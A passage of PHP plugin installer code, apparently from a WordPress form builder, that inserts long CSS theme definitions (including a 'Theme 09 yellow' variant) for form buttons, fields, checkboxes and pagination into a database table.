0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #727272;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/01/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(32, \'Theme 09 yellow\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #E9B500;\r\nmargin-bottom: 10px;\r\ncolor: #E9B500;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E9B500;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: 